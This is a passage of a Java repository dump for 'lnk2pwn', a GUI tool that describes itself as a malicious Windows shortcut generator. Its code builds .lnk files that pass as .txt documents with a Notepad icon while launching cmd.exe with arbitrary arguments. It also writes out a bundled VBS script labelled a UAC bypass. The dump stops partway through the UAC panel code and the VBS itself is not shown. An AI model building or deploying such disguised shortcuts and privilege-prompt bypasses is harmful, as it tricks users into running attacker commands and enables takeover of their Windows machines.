Repository: it-gorillaz/lnk2pwn
Branch: master
Commit: 67b6adb867a1
Files: 27
Total size: 40.5 KB
Directory structure:
gitextract_9znlghm7/
├── .gitignore
├── LICENSE
├── README.md
├── pom.xml
└── src/
├── main/
│ ├── java/
│ │ └── com/
│ │ └── itgorillaz/
│ │ └── lnk2pwn/
│ │ ├── ApplicationRunner.java
│ │ ├── Lnk2Pwn.java
│ │ ├── config/
│ │ │ ├── ModelConfig.java
│ │ │ └── UACBypassConfig.java
│ │ ├── controller/
│ │ │ └── ShortcutController.java
│ │ ├── model/
│ │ │ └── Shortcut.java
│ │ └── view/
│ │ ├── AboutDialog.java
│ │ ├── Lnk2PwnFrame.java
│ │ ├── MenuBar.java
│ │ ├── action/
│ │ │ ├── ExitAction.java
│ │ │ ├── GenerateShortcutAction.java
│ │ │ └── ShowAboutDialogAction.java
│ │ ├── core/
│ │ │ ├── BoundsPolicy.java
│ │ │ ├── DefaultWindowController.java
│ │ │ └── WindowController.java
│ │ ├── form/
│ │ │ ├── FormPanel.java
│ │ │ ├── ShortcutInfoPanel.java
│ │ │ └── UACBypassPanel.java
│ │ └── utils/
│ │ ├── ColorUtils.java
│ │ └── IconFactory.java
│ └── resources/
│ ├── log4j.properties
│ └── vbs/
│ └── uac_bypass.vbs
└── test/
└── java/
└── com/
└── itgorillaz/
└── lnk2pwn/
└── AppTest.java
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
# Directories #
/build/
/bin/
target/
# OS Files #
.DS_Store
# Compiled class file
*.class
# Package Files #
*.jar
*.war
*.ear
*.db
*.nar
*.zip
*.tar.gz
*.rar
######################
# Windows
######################
# Windows image file caches
Thumbs.db
# Folder config file
Desktop.ini
######################
# OSX
######################
.DS_Store
.svn
# Thumbnails
._*
# Files that might appear on external disk
.Spotlight-V100
.Trashes
######################
# Eclipse
######################
*.pydevproject
.project
.metadata
bin/**
tmp/**
tmp/**/*
*.tmp
*.bak
*.swp
*~.nib
local.properties
.classpath
.settings/
.loadpath
/src/main/resources/rebel.xml
# External tool builders
.externalToolBuilders/
# Locally stored "Eclipse launch configurations"
*.launch
# CDT-specific
.cproject
# PDT-specific
.buildpath
*.iml
.idea/*
# Log file
*.log
# BlueJ files
*.ctxt
# Mobile Tools for Java (J2ME)
.mtj.tmp/
# virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
hs_err_pid*
/target/
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2018 ITGorillaz
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
# lnk2pwn
Malicious Shortcut(.lnk) Generator
## About
**lnk2pwn** is a gui tool that automates the process of generating malicious .lnk(Windows shortcut) files.
Motivation: https://medium.com/@tommelo/pwned-by-a-shortcut-b21473970944
POC: https://www.youtube.com/watch?v=EC5ei48MCG8
## License
This is an open-source software licensed under the [MIT license](https://opensource.org/licenses/MIT).
================================================
FILE: pom.xml
================================================
4.0.0
com.itgorillaz
lnk2pwn
1.0.0
jar
lnk2pwn
http://maven.apache.org
org.springframework.boot
spring-boot-starter-parent
2.1.0.RELEASE
UTF-8
UTF-8
1.8
1.8
1.8
org.springframework.boot
spring-boot-starter
org.springframework.boot
spring-boot-starter-logging
com.miglayout
miglayout
3.7.4
com.weblookandfeel
weblaf-core
1.2.8
com.weblookandfeel
weblaf-ui
1.2.8
com.github.vatbub
mslinks
1.1.4-SNAPSHOT
org.apache.logging.log4j
log4j-core
org.apache.logging.log4j
log4j-api
org.springframework.boot
spring-boot-starter-test
test
junit
junit
test
org.springframework.boot
spring-boot-maven-plugin
repackage
com.itgorillaz.lnk2pwn.Lnk2Pwn
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/ApplicationRunner.java
================================================
package com.itgorillaz.lnk2pwn;
import javax.swing.SwingUtilities;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.CommandLineRunner;
import org.springframework.stereotype.Component;
import com.alee.laf.WebLookAndFeel;
import com.itgorillaz.lnk2pwn.view.Lnk2PwnFrame;
import com.itgorillaz.lnk2pwn.view.core.BoundsPolicy;
import com.itgorillaz.lnk2pwn.view.core.WindowController;
@Component
public class ApplicationRunner implements CommandLineRunner {
private static final Logger LOGGER = LogManager.getLogger(ApplicationRunner.class);
@Autowired
private WindowController windowController;
@Autowired
private Lnk2PwnFrame frame;
@Override
public void run(String... args) throws Exception {
LOGGER.info("Installing Web Look And Feel");
WebLookAndFeel.install();
SwingUtilities.invokeLater(new Runnable() {
@Override
public void run() {
LOGGER.info("Running the main frame");
windowController.show(frame, BoundsPolicy.MAXIMIZE);
}
});
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/Lnk2Pwn.java
================================================
package com.itgorillaz.lnk2pwn;
import java.io.IOException;
import org.springframework.boot.Banner.Mode;
import org.springframework.boot.WebApplicationType;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.boot.builder.SpringApplicationBuilder;
@SpringBootApplication
public class Lnk2Pwn {
public static void main(String[] args) throws IOException {
new SpringApplicationBuilder(Lnk2Pwn.class)
.web(WebApplicationType.NONE)
.bannerMode(Mode.OFF)
.headless(false)
.build()
.run(args);
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/config/ModelConfig.java
================================================
package com.itgorillaz.lnk2pwn.config;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import com.itgorillaz.lnk2pwn.model.Shortcut;
@Configuration
public class ModelConfig {
@Bean
public Shortcut shortchut() {
return new Shortcut();
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/config/UACBypassConfig.java
================================================
package com.itgorillaz.lnk2pwn.config;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.stream.Collectors;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
@Configuration
public class UACBypassConfig {
private static final Logger LOGGER = LogManager.getLogger(UACBypassConfig.class);
private final String LINE_SEPARATOR = System.lineSeparator();
private final String VBS_SOURCE_CODE_PATH = "vbs/uac_bypass.vbs";
@Bean(name="VBSSourceCode")
public String getVBSSourceCode() {
LOGGER.info("Loading VBS(UAC Bypass) source code");
InputStream in = UACBypassConfig.class.getClassLoader()
.getResourceAsStream(VBS_SOURCE_CODE_PATH);
return new BufferedReader(new InputStreamReader(in))
.lines()
.collect(Collectors.joining(LINE_SEPARATOR));
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/controller/ShortcutController.java
================================================
package com.itgorillaz.lnk2pwn.controller;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;
import java.util.Objects;
import javax.annotation.PostConstruct;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.stereotype.Component;
import com.github.vatbub.mslinks.ShellLink;
import com.github.vatbub.mslinks.ShellLinkException;
import com.github.vatbub.mslinks.ShellLinkHeader;
import com.itgorillaz.lnk2pwn.model.Shortcut;
@Component
public class ShortcutController {
private static final Logger LOGGER = LogManager.getLogger(ShortcutController.class);
private final String LINK_EXT = ".lnk";
private final Map WINDOW_STYLE_MAP = new HashMap<>();
@PostConstruct
private void initWindowStyleMap() {
WINDOW_STYLE_MAP.put("MINIMIZED", ShellLinkHeader.SW_SHOWMINNOACTIVE);
WINDOW_STYLE_MAP.put("MAXIMIZED", ShellLinkHeader.SW_SHOWMAXIMIZED);
WINDOW_STYLE_MAP.put("NORMAL", ShellLinkHeader.SW_SHOWNORMAL);
}
public void generateShortcut(Shortcut shortcut) throws IOException, ShellLinkException {
LOGGER.info("Generating a new shortcut(.lnk)");
String fileName = String.valueOf(shortcut.getFileName());
String fakeExtension = String.valueOf(shortcut.getFakeExtension());
String workingDir = String.valueOf(shortcut.getWorkingDir());
String targetPath = String.valueOf(shortcut.getTargetPath());
String arguments = String.valueOf(shortcut.getArguments());
String iconLocation = String.valueOf(shortcut.getIconLocation());
String windowStyle = shortcut.getWindowStyle();
Integer iconIndex = shortcut.getIconIndex();
String vbsFileName = String.valueOf(shortcut.getVbsFileName());
String commandOuput = String.valueOf(shortcut.getCommandOuput());
String outputPath = String.valueOf(shortcut.getOutputPath());
String linkName = fileName.concat(fakeExtension);
LOGGER.info(String.format("File Name: %s", fileName));
LOGGER.info(String.format("Fake Extension: %s", fakeExtension));
LOGGER.info(String.format("Working Dir: %s", workingDir));
LOGGER.info(String.format("Target Path: %s", targetPath));
LOGGER.info(String.format("Arguments: %s", arguments));
LOGGER.info(String.format("Icon Location: %s", iconLocation));
LOGGER.info(String.format("Icon Index: %s", iconIndex));
LOGGER.info(String.format("Window Style: %s", windowStyle));
LOGGER.info(String.format("VBS File Name: %s", vbsFileName));
LOGGER.info(String.format("Link Name: %s", linkName));
LOGGER.info(String.format("Output Path: %s", outputPath));
LOGGER.info(String.format("Command Output:\n%s", commandOuput));
ShellLink sl = ShellLink.createLink(linkName)
.setWorkingDir(workingDir)
.setTarget(targetPath)
.setCMDArgs(arguments)
.setIconLocation(iconLocation);
sl.getHeader().setShowCommand(WINDOW_STYLE_MAP.get(shortcut.getWindowStyle()));
if (!Objects.isNull(iconIndex)) {
sl.getHeader().setIconIndex(iconIndex);
}
String linkOutput = outputPath
.concat("/")
.concat(linkName)
.concat(LINK_EXT);
String vbsOutput = outputPath
.concat("/")
.concat(vbsFileName);
Files.write(Paths.get(vbsOutput), commandOuput.getBytes());
sl.saveTo(linkOutput);
LOGGER.info("Shortcut successfully generated!");
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/model/Shortcut.java
================================================
package com.itgorillaz.lnk2pwn.model;
public class Shortcut {
private String targetPath;
private String workingDir;
private String arguments;
private String description;
private String fileName;
private String fakeExtension;
private String iconLocation;
private Integer iconIndex;
private String windowStyle;
private String vbsFileName;
private String command;
private String commandOuput;
private String outputPath;
public String getTargetPath() {
return targetPath;
}
public void setTargetPath(String targetPath) {
this.targetPath = targetPath;
}
public String getWorkingDir() {
return workingDir;
}
public void setWorkingDir(String workingDir) {
this.workingDir = workingDir;
}
public String getArguments() {
return arguments;
}
public void setArguments(String arguments) {
this.arguments = arguments;
}
public String getDescription() {
return description;
}
public void setDescription(String description) {
this.description = description;
}
public String getFileName() {
return fileName;
}
public void setFileName(String fileName) {
this.fileName = fileName;
}
public String getFakeExtension() {
return fakeExtension;
}
public void setFakeExtension(String fakeExtension) {
this.fakeExtension = fakeExtension;
}
public String getIconLocation() {
return iconLocation;
}
public void setIconLocation(String iconPath) {
this.iconLocation = iconPath;
}
public Integer getIconIndex() {
return iconIndex;
}
public void setIconIndex(Integer iconIndex) {
this.iconIndex = iconIndex;
}
public String getWindowStyle() {
return windowStyle;
}
public void setWindowStyle(String windowStyle) {
this.windowStyle = windowStyle;
}
public String getVbsFileName() {
return vbsFileName;
}
public void setVbsFileName(String vbsFileName) {
this.vbsFileName = vbsFileName;
}
public String getCommand() {
return command;
}
public void setCommand(String command) {
this.command = command;
}
public String getCommandOuput() {
return commandOuput;
}
public void setCommandOuput(String commandOuput) {
this.commandOuput = commandOuput;
}
public String getOutputPath() {
return outputPath;
}
public void setOutputPath(String outputPath) {
this.outputPath = outputPath;
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/view/AboutDialog.java
================================================
package com.itgorillaz.lnk2pwn.view;
import javax.annotation.PostConstruct;
import org.springframework.stereotype.Component;
import com.alee.extended.label.WebLinkLabel;
import com.alee.extended.label.WebMultiLineLabel;
import com.alee.laf.rootpane.WebDialog;
import com.itgorillaz.lnk2pwn.view.utils.IconFactory;
import net.miginfocom.swing.MigLayout;
@Component
public class AboutDialog extends WebDialog {
private static final long serialVersionUID = 2844121433961138163L;
@PostConstruct
private void initComponents() {
this.setModal(true);
this.setTitle("About");
this.setSize(400, 250);
this.setLayout(new MigLayout("", "[grow]", "[]50[]"));
WebMultiLineLabel label = new WebMultiLineLabel (getBanner(), WebMultiLineLabel.CENTER);
this.add(label, "wrap");
WebLinkLabel github = new WebLinkLabel("https://github.com/it-gorillaz/lnk2pwn", WebLinkLabel.CENTER);
github.setLink("https://github.com/it-gorillaz/lnk2pwn");
github.setIcon(IconFactory.getIcon("github.png"));
this.add(github, "grow");
}
private String getBanner() {
return
",-*\n" +
"(_).lnk\n" +
"-----------------\n" +
"\n" +
"Malicious Shortcut(.lnk) Generator\n" +
"[v1.0.0]";
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/view/Lnk2PwnFrame.java
================================================
package com.itgorillaz.lnk2pwn.view;
import javax.annotation.PostConstruct;
import javax.swing.JFrame;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import com.alee.laf.rootpane.WebFrame;
import com.itgorillaz.lnk2pwn.view.form.FormPanel;
import com.itgorillaz.lnk2pwn.view.utils.IconFactory;
import net.miginfocom.swing.MigLayout;
@Component
public class Lnk2PwnFrame extends WebFrame {
private static final long serialVersionUID = 8887385829173862121L;
private final MigLayout LAYOUT = new MigLayout("",
"[grow]",
"[]");
@Autowired
private MenuBar menubar;
@Autowired
private FormPanel formPanel;
@PostConstruct
private void initComponents() {
this.setTitle("lnk2pwn");
this.setName("lnk2pwn");
this.setIconImage(IconFactory.getIcon("bomb.png").getImage());
this.setLayout(LAYOUT);
this.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
this.setJMenuBar(menubar);
this.add(formPanel, "grow");
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/view/MenuBar.java
================================================
package com.itgorillaz.lnk2pwn.view;
import javax.annotation.PostConstruct;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import com.alee.laf.menu.WebMenu;
import com.alee.laf.menu.WebMenuBar;
import com.alee.laf.menu.WebMenuItem;
import com.alee.laf.separator.WebSeparator;
import com.itgorillaz.lnk2pwn.view.action.ExitAction;
import com.itgorillaz.lnk2pwn.view.action.ShowAboutDialogAction;
import com.itgorillaz.lnk2pwn.view.utils.IconFactory;
@Component
public class MenuBar extends WebMenuBar {
private static final long serialVersionUID = -288171329249268844L;
@Autowired
private ExitAction exitAction;
@Autowired
private ShowAboutDialogAction showAboutDialogAction;
@PostConstruct
private void initComponents() {
WebMenu menu = new WebMenu("File");
menu.setIcon(IconFactory.getIcon("file.png"));
WebMenuItem about = new WebMenuItem("About");
about.setIcon(IconFactory.getIcon("about.png"));
about.addActionListener(showAboutDialogAction);
WebMenuItem exit = new WebMenuItem("Exit");
exit.setIcon(IconFactory.getIcon("exit.png"));
exit.addActionListener(exitAction);
menu.add(about);
menu.add(new WebSeparator());
menu.add(exit);
this.add(menu);
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/view/action/ExitAction.java
================================================
package com.itgorillaz.lnk2pwn.view.action;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.stereotype.Component;
@Component
public class ExitAction implements ActionListener {
private static final Logger LOGGER = LogManager.getLogger(ExitAction.class);
@Override
public void actionPerformed(ActionEvent event) {
LOGGER.info("Shutting down the application");
System.exit(0);
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/view/action/GenerateShortcutAction.java
================================================
package com.itgorillaz.lnk2pwn.view.action;
import java.awt.Desktop;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.io.File;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import com.alee.extended.filechooser.WebDirectoryChooser;
import com.alee.laf.optionpane.WebOptionPane;
import com.alee.utils.swing.DialogOptions;
import com.itgorillaz.lnk2pwn.controller.ShortcutController;
import com.itgorillaz.lnk2pwn.model.Shortcut;
import com.itgorillaz.lnk2pwn.view.core.WindowController;
@Component
public class GenerateShortcutAction implements ActionListener {
private static final Logger LOGGER = LogManager.getLogger(GenerateShortcutAction.class);
@Autowired
private Shortcut shortcut;
@Autowired
private ShortcutController controller;
@Autowired
private WindowController windowController;
private WebDirectoryChooser directoryChooser;
@Override
public void actionPerformed(ActionEvent event) {
LOGGER.info("Generate button clicked");
if (directoryChooser == null) {
directoryChooser = new WebDirectoryChooser(windowController.getRootFrame());
}
LOGGER.info("Openning the directory chooser");
directoryChooser.setVisible(true);
if (directoryChooser.getResult () == DialogOptions.CANCEL_OPTION){
LOGGER.info("No output path selected, canceling the action");
return;
}
File outputPath = directoryChooser.getSelectedDirectory();
shortcut.setOutputPath(outputPath.getAbsolutePath());
try {
controller.generateShortcut(shortcut);
int result = WebOptionPane.showConfirmDialog(
windowController.getRootFrame(),
"Shortcut successfully generated!\nWould you like to open the folder location?",
"Shortcut",
WebOptionPane.YES_NO_OPTION,
WebOptionPane.INFORMATION_MESSAGE);
if (WebOptionPane.YES_OPTION == result) {
LOGGER.info("Openning the output path");
Desktop.getDesktop().open(outputPath);
}
} catch (Exception e) {
LOGGER.error(e);
}
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/view/action/ShowAboutDialogAction.java
================================================
package com.itgorillaz.lnk2pwn.view.action;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import com.itgorillaz.lnk2pwn.view.AboutDialog;
import com.itgorillaz.lnk2pwn.view.core.WindowController;
@Component
public class ShowAboutDialogAction implements ActionListener {
private static final Logger LOGGER = LogManager.getLogger(ShowAboutDialogAction.class);
@Autowired
private WindowController windowController;
@Autowired
private AboutDialog aboutDialog;
@Override
public void actionPerformed(ActionEvent event) {
LOGGER.info("About button clicked");
LOGGER.info("Openning the about modal dialog");
aboutDialog.setLocationRelativeTo(windowController.getRootFrame());
aboutDialog.setVisible(true);
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/view/core/BoundsPolicy.java
================================================
package com.itgorillaz.lnk2pwn.view.core;
public enum BoundsPolicy {
PACK_ONLY,
PACK_AND_CENTER,
CENTER_ONLY,
MAXIMIZE,
MAXIMIZE_BOTH,
RESTORE_LAST_STATE
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/view/core/DefaultWindowController.java
================================================
package com.itgorillaz.lnk2pwn.view.core;
import java.awt.AWTEvent;
import java.awt.Dimension;
import java.awt.EventQueue;
import java.awt.Insets;
import java.awt.Toolkit;
import java.awt.Window;
import java.awt.event.AWTEventListener;
import java.awt.event.WindowEvent;
import javax.swing.JFrame;
import org.springframework.stereotype.Component;
@Component
public class DefaultWindowController implements WindowController, AWTEventListener {
private Window window;
private JFrame root;
@Override
public void show(JFrame frame, BoundsPolicy policy) {
Toolkit.getDefaultToolkit().addAWTEventListener(this, AWTEvent.WINDOW_EVENT_MASK);
this.root = frame;
this.initBounds(frame, policy);
frame.setVisible(true);
}
@Override
public Window getActiveWindow() {
return window;
}
@Override
public JFrame getRootFrame() {
return root;
}
@Override
public void eventDispatched(AWTEvent event) {
if (event instanceof WindowEvent) {
WindowEvent windowEvent = (WindowEvent) event;
switch(windowEvent.getID())
{
case WindowEvent.WINDOW_ACTIVATED:
window = windowEvent.getWindow();
break;
case WindowEvent.WINDOW_DEACTIVATED:
window = null;
break;
default:
break;
}
}
}
private void initBounds(JFrame frame, BoundsPolicy policy) {
if (!EventQueue.isDispatchThread()) {
throw new IllegalStateException("WindowController.show() should be called "
+ "from the Event Dispatch Thread.");
}
switch(policy) {
case CENTER_ONLY:
frame.setLocationRelativeTo(null);
break;
case MAXIMIZE_BOTH:
frame.setState(JFrame.MAXIMIZED_BOTH);
break;
case PACK_ONLY:
frame.pack();
break;
case PACK_AND_CENTER:
frame.pack();
frame.setLocationRelativeTo(null);
break;
case MAXIMIZE:
Toolkit toolkit = Toolkit.getDefaultToolkit();
Dimension dimension = toolkit.getScreenSize();
Insets insets = toolkit.getScreenInsets(frame.getGraphicsConfiguration());
int width = dimension.width - (insets.left + insets.top);
int height = dimension.height - (insets.top + insets.bottom);
int x = insets.left;
int y = insets.right;
frame.pack();
frame.setSize(width, height);
frame.setLocation(x, y);
break;
case RESTORE_LAST_STATE:
break;
default:
break;
}
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/view/core/WindowController.java
================================================
package com.itgorillaz.lnk2pwn.view.core;
import java.awt.Window;
import javax.swing.JFrame;
public interface WindowController {
public void show(JFrame frame, BoundsPolicy policy);
public Window getActiveWindow();
public JFrame getRootFrame();
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/view/form/FormPanel.java
================================================
package com.itgorillaz.lnk2pwn.view.form;
import javax.annotation.PostConstruct;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import com.alee.extended.painter.TitledBorderPainter;
import com.alee.laf.button.WebButton;
import com.alee.laf.panel.WebPanel;
import com.itgorillaz.lnk2pwn.view.action.GenerateShortcutAction;
import com.itgorillaz.lnk2pwn.view.utils.IconFactory;
import net.miginfocom.swing.MigLayout;
@Component
public class FormPanel extends WebPanel {
private static final long serialVersionUID = 4905134163745537325L;
private WebButton generateButton = new WebButton("Generate Shortcut", IconFactory.getIcon("skull.png"));
@Autowired
private ShortcutInfoPanel shortcutInfoPanel;
@Autowired
private UACBypassPanel uacBypassPanel;
@Autowired
private GenerateShortcutAction generateShortcutAction;
@PostConstruct
private void initComponents() {
this.setLayout(new MigLayout("", "[grow]", "[][grow][]"));
generateButton.addActionListener(generateShortcutAction);
shortcutInfoPanel.setPainter(new TitledBorderPainter<>("Shortcut"));
uacBypassPanel.setPainter(new TitledBorderPainter<>("UAC Bypass"));
WebPanel generatePanel = createGenerateButtonPanel();
this.add(shortcutInfoPanel, "grow,wrap");
this.add(uacBypassPanel, "w 100%,h 100%,wrap");
this.add(generatePanel, "grow");
}
private WebPanel createGenerateButtonPanel() {
MigLayout layout = new MigLayout("", "[grow]", "");
WebPanel panel = new WebPanel();
panel.setLayout(layout);
panel.add(generateButton, "east");
return panel;
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/view/form/ShortcutInfoPanel.java
================================================
package com.itgorillaz.lnk2pwn.view.form;
import javax.annotation.PostConstruct;
import javax.swing.event.ChangeEvent;
import javax.swing.event.ChangeListener;
import javax.swing.event.DocumentEvent;
import javax.swing.event.DocumentListener;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Component;
import com.alee.laf.combobox.WebComboBox;
import com.alee.laf.label.WebLabel;
import com.alee.laf.panel.WebPanel;
import com.alee.laf.text.WebTextField;
import com.itgorillaz.lnk2pwn.model.Shortcut;
import net.miginfocom.swing.MigLayout;
@Component
public class ShortcutInfoPanel extends WebPanel implements DocumentListener, ChangeListener {
private static final long serialVersionUID = 4663408720514745622L;
private final String DEFAULT_TARGET_PATH = "C:\\Windows\\System32\\cmd.exe";
private final String DEFAULT_WORKING_DIR = "C:\\Windows\\System32";
private final String DEFAULT_ARGUMENTS = "/c notepad.exe";
private final String DEFAULT_FAKE_EXTENSION = ".txt";
private final String DEFAULT_ICON_DLL = "C:\\Windows\\System32\\notepad.exe";
private final String[] WINDOW_STYLES = {"MINIMIZED", "MAXIMIZED", "NORMAL"};
private WebTextField targetPathField = new WebTextField();
private WebTextField workingDirField = new WebTextField();
private WebTextField argumentsField = new WebTextField();
private WebTextField shortcutFileNameField = new WebTextField();
private WebTextField fakeExtensionField = new WebTextField();
private WebTextField iconPathField = new WebTextField();
private WebTextField iconIndexField = new WebTextField();
private WebComboBox windowStyleComboBox = new WebComboBox(WINDOW_STYLES);
@Autowired
private Shortcut shortcut;
@PostConstruct
private void initComponents() {
this.setLayout(new MigLayout("", "[grow]", ""));
targetPathField.getDocument().addDocumentListener(this);
workingDirField.getDocument().addDocumentListener(this);
argumentsField.getDocument().addDocumentListener(this);
shortcutFileNameField.getDocument().addDocumentListener(this);
fakeExtensionField.getDocument().addDocumentListener(this);
iconPathField.getDocument().addDocumentListener(this);
iconIndexField.getDocument().addDocumentListener(this);
targetPathField.setText(DEFAULT_TARGET_PATH);
workingDirField.setText(DEFAULT_WORKING_DIR);
argumentsField.setText(DEFAULT_ARGUMENTS);
fakeExtensionField.setText(DEFAULT_FAKE_EXTENSION);
iconPathField.setText(DEFAULT_ICON_DLL);
WebPanel targetAndWorkingDirPanel = createTargetPathAndWorkingDirPanel();
WebPanel argumentsPanel = createArgumentsPanel();
WebPanel shortcutDetailsPanel = createShortcutDetailsPanel();
this.add(targetAndWorkingDirPanel, "grow,wrap");
this.add(argumentsPanel, "grow,wrap");
this.add(shortcutDetailsPanel, "grow,wrap");
}
private WebPanel createTargetPathAndWorkingDirPanel() {
MigLayout layout = new MigLayout("", "[grow][grow]", "");
WebPanel panel = new WebPanel();
panel.setLayout(layout);
panel.add(new WebLabel("Target Path"));
panel.add(new WebLabel("Working Dir"), "wrap");
panel.add(targetPathField, "grow");
panel.add(workingDirField, "grow");
return panel;
}
private WebPanel createArgumentsPanel() {
MigLayout layout = new MigLayout("", "[grow]", "");
WebPanel panel = new WebPanel();
panel.setLayout(layout);
panel.add(new WebLabel("Arguments"), "wrap");
panel.add(argumentsField, "grow");
return panel;
}
private WebPanel createShortcutDetailsPanel() {
MigLayout layout = new MigLayout("", "[grow][grow][grow][][grow]", "");
WebPanel panel = new WebPanel();
panel.setLayout(layout);
panel.add(new WebLabel("File Name"));
panel.add(new WebLabel("Fake Extension"));
panel.add(new WebLabel("Icon Location"));
panel.add(new WebLabel("Icon Index"));
panel.add(new WebLabel("Window Style"), "wrap");
panel.add(shortcutFileNameField, "grow");
panel.add(fakeExtensionField, "grow");
panel.add(iconPathField, "grow");
panel.add(iconIndexField, "grow");
panel.add(windowStyleComboBox, "grow");
return panel;
}
@Override
public void changedUpdate(DocumentEvent arg0) {
updateModel();
}
@Override
public void insertUpdate(DocumentEvent arg0) {
updateModel();
}
@Override
public void removeUpdate(DocumentEvent arg0) {
updateModel();
}
@Override
public void stateChanged(ChangeEvent arg0) {
updateModel();
}
private void updateModel() {
Integer iconIndex = null;
try {
iconIndex = Integer.parseInt(iconIndexField.getText());
} catch(NumberFormatException e) {
// do nothing
}
shortcut.setTargetPath(targetPathField.getText());
shortcut.setWorkingDir(workingDirField.getText());
shortcut.setArguments(argumentsField.getText());
shortcut.setFileName(shortcutFileNameField.getText());
shortcut.setFakeExtension(fakeExtensionField.getText());
shortcut.setIconLocation(iconPathField.getText());
shortcut.setIconIndex(iconIndex);
shortcut.setWindowStyle(String.valueOf(windowStyleComboBox.getSelectedItem()));
}
}
================================================
FILE: src/main/java/com/itgorillaz/lnk2pwn/view/form/UACBypassPanel.java
================================================
package com.itgorillaz.lnk2pwn.view.form;
import java.awt.Color;
import java.awt.event.KeyEvent;
import java.awt.event.KeyListener;
import javax.annotation.PostConstruct;
import javax.swing.event.DocumentEvent;
import javax.swing.event.DocumentListener;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Qualifier;
import org.springframework.stereotype.Component;
import com.alee.laf.label.WebLabel;
import com.alee.laf.panel.WebPanel;
import com.alee.laf.scroll.WebScrollPane;
import com.alee.laf.text.WebTextArea;
import com.alee.laf.text.WebTextField;
import com.itgorillaz.lnk2pwn.model.Shortcut;
import com.itgorillaz.lnk2pwn.view.utils.ColorUtils;
import net.miginfocom.swing.MigLayout;
@Component
public class UACBypassPanel extends WebPanel implements KeyListener, DocumentListener {
private static final long serialVersionUID = 8564799804491915041L;
private final String DEFAULT_UAC_BYPASS_FILE_NAME = "uac_bypass.vbs";
private final Color COMMAND_BG_COLOR = ColorUtils.hex2Rgb("#1e1e1e");
private WebTextField uacFileNameField = new WebTextField();
private WebTextArea uacCommandTextArea = new WebTextArea();
private WebTextArea uacOuputTextArea = new WebTextArea();
@Autowired
@Qualifier("VBSSourceCode")
private String vbsSourceCode;
@Autowired
private Shortcut shortcut;
@PostConstruct
private void initComponents() {
MigLayout layout = new MigLayout("", "[grow]", "");
this.setLayout(layout);
this.add(createUACFileNamePanel(), "grow,wrap");
this.add(createUACCommandPanel(), "grow,wrap");
uacFileNameField.getDocument().addDocumentListener(this);
uacOuputTextArea.getDocument().addDocumentListener(this);
uacCommandTextArea.addKeyListener(this);
uacFileNameField.setText(DEFAULT_UAC_BYPASS_FILE_NAME);
uacOuputTextArea.setText(vbsSourceCode);
}
@Override
public void keyReleased(KeyEvent event) {
changeOutput(uacCommandTextArea.getText());
}
@Override
public void keyPressed(KeyEvent event) {
}
@Override
public void keyTyped(KeyEvent event) {
}
private void changeOutput(String command) {
